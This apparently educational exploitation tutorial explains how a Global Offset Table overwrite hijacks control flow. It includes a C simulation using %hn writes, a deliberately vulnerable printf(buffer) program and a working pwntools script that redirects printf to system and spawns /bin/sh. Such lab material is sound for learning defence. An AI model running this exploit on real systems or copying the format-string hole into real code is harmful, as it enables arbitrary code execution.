GOT Overwrite

The Global Offset Table (GOT) is a writable table, filled in by the dynamic linker, that holds the resolved addresses of functions imported from shared libraries (such as libc). A call to an imported function goes through its PLT stub, which jumps to whatever address is stored in that function's GOT entry. Overwriting one of these entries therefore lets an attacker redirect the next call to that function, hijacking control flow and, with a suitable target such as system, executing arbitrary code.

How it works?

The attacker overwrites a targeted GOT entry, for example through a buffer overflow or a format string vulnerability, with the address of an arbitrary function such as system. The next time the program calls the original function, the PLT stub loads the corrupted entry and jumps to the attacker's function instead, with whatever arguments the program intended for the original call. This only works while the GOT is writable: a binary linked with Full RELRO (-z relro -z now) has its GOT remapped read-only after relocation, whereas Partial RELRO (the common default for lazily bound binaries) leaves the .got.plt entries writable.
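The mechanism described above, as an added illustration that is not part of the original page: a small C program models the GOT as a table of function pointers reached through a PLT-like dispatcher, then corrupts one slot with the same %hn write primitive that fmtstr_payload relies on (the pointer is written two bytes at a time by padding the output to the 16-bit chunk value and letting %hn store the character count). The table, the callee names and the 0x1337 marker are constructed for the demo; a little-endian target is assumed, and unlike a real binary nothing here is protected by RELRO.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One entry per imported function, like the real .got.plt (writable without Full RELRO). */
typedef int (*import_fn)(const char *);

/* Constructed stand-ins: the intended callee and the function the attacker wants instead. */
static int intended_callee(const char *s) { return (int)strlen(s); }
static int attacker_callee(const char *s) { (void)s; return 0x1337; }

enum { GOT_PUTS = 0, GOT_COUNT };
static import_fn fake_got[GOT_COUNT] = { intended_callee };

/* What a PLT stub does: load the slot and jump through it with the caller's argument. */
static int call_via_plt(int slot, const char *arg)
{
    return fake_got[slot](arg);
}

/* Store `value` into the pointer-sized slot at `dst` using %hn, one 16-bit half at a time.
 * "%*c" pads the output to exactly `chunk` characters and "%hn" then stores that count
 * into the half-word, which is how fmtstr_payload builds its writes. Assumes little-endian,
 * so half i of the pointer lives at byte offset 2*i. A chunk of 0 needs no padding at all. */
static void fmt_write_pointer(void *dst, uintptr_t value)
{
    short *halves = (short *)dst;
    for (size_t i = 0; i < sizeof(uintptr_t) / 2; i++) {
        int chunk = (int)((value >> (16 * i)) & 0xffff);
        if (chunk == 0)
            snprintf(NULL, 0, "%hn", &halves[i]);
        else
            snprintf(NULL, 0, "%*c%hn", chunk, 'A', &halves[i]);
    }
}

/* Call through the slot, overwrite it, call again; returns 1 if the hijack took effect. */
int demo_got_overwrite(void)
{
    int before = call_via_plt(GOT_PUTS, "hello");       /* intended_callee: strlen == 5 */
    fmt_write_pointer(&fake_got[GOT_PUTS], (uintptr_t)attacker_callee);
    int after = call_via_plt(GOT_PUTS, "hello");        /* now lands in attacker_callee */
    return (before == 5 && after == 0x1337) ? 1 : 0;
}

/* Expose the slot contents so a caller can confirm what the table now points at. */
int got_slot_points_to_attacker(void)
{
    return fake_got[GOT_PUTS] == attacker_callee;
}

int main(void)
{
    printf("GOT overwrite %s\n", demo_got_overwrite() ? "redirected the call" : "failed");
    return 0;
}
```

The same write sequence is what the exploit later in this page sends through the vulnerable printf; the difference is that there the %hn conversions reach the GOT address by indexing the attacker's payload on the stack rather than by being passed a pointer directly.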

Code example

#include <stdio.h>

void vuln() {
    char buffer[300];

    while(1) {
        /* Bounded read, so no stack overflow here. */
        fgets(buffer, sizeof(buffer), stdin);

        /* Vulnerable: user input is used directly as the format string,
         * so %p leaks the stack and %n / %hn writes to attacker-chosen addresses. */
        printf(buffer);
        puts("");
    }
}

int main() {
    vuln();

    return 0;
}

Because the program calls printf in a loop, a single format string can overwrite the printf GOT entry, and the very next line read by fgets is then handed to system instead of printf:

from pwn import *

# Load the ELF file and set it as the binary in the context
# (sets the architecture and word size, 32-bit here, for fmtstr_payload)
elf = context.binary = ELF('./chall')

# Load the libc library and set its base address.
# ASLR is assumed to be disabled, so the base is fixed across runs
# (read it from /proc/<pid>/maps or vmmap in a debugger).
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc.address = 0xf7dc2000

p = process()

# Create a format string payload that overwrites the printf GOT entry
# with the address of system. The first argument is the stack offset at
# which printf finds the start of our input (found beforehand by sending
# AAAA%p%p... and seeing which position echoes 0x41414141); 5 is the
# value for this binary. This requires the GOT to be writable, i.e.
# Partial RELRO or no RELRO (check with checksec).
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})

# Send the payload; this printf call performs the writes
p.sendline(payload)

# Discard the padding output produced by the format string
p.clean()

# Send the command: the next printf(buffer) is now system(buffer)
p.sendline(b'/bin/sh')

# Enter interactive mode
p.interactive()
